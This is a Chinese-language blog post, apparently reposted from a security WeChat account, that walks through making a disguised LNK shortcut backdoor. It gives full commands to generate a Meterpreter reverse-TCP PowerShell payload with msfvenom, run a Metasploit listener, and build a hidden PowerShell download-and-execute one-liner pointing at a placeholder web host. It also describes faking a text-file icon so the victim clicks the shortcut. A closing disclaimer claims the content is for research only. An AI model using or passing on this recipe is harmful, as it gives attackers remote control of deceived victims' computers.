0X00
其实这些东西也没什么好稀奇的,很多大牛都已经事先复现成功了,但是我也想来造一个轮子!
0X01
主要就是在复现的基础上加上一些以前自己玩badusb的小技巧
0X02
我们首先用MSF生成一个payload:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=你的IP LPORT=端口 -f psh-reflection >ww.ps1
(我这边是用的外网的kali所以在Xshell里面执行的)
现在用sz ww.ps1命令把生成的payload下载到本机电脑
然后将ww.ps1上传到你自己的web目录下!
这边设置msf监听payload
1:use exploit/multi/handler (执行MSF的监听模块)
2:set payload windows/meterpreter/reverse_tcp (设置监听payload)
3:set LHOST IP
4:set LPORT 端口
5:set exitonsession false (开启后台监听)
6:exploit -j (开始监听)
0X02
这边我们就来制作我们的lnk后门程序了!
cmd.exe /c start /min powershell -w hidden ""IEX (New-Object Net.WebClient).DownloadString('http://www.xxxx.com/ww.ps1'); ""
这段代码的意思是以cmd执行powershell远程下载并执行我web目录下的ww.ps1文件!其中/c start /min powershell -w hidden主要作用就是为了隐藏powershell那个蓝色的框
这样的东西你发给谁他都不会打开的!
在这里你随便输入个字母然后回车就会出现很多图标给你更换
我们换个系统文本的图标
然后我们双击运行
这边已经成功反弹回来了
0X04
只是造个轮子,很多地方还比不上大佬些,各种奇淫技巧还需要大佬们支招!
本文始发于微信公众号(T00ls):Lnk快捷方式复现小技巧
免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论